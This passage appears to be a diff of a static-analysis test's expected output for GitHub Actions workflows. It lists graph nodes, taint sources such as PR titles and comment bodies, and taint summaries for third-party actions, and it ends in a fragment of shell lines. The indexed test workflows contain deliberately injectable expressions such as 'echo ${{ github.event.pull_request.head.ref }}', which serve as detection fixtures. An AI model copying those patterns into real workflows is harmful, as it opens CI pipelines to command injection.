| actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | * | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV echo "EOF" >> $GITHUB_ENV - - run: | + - env: + 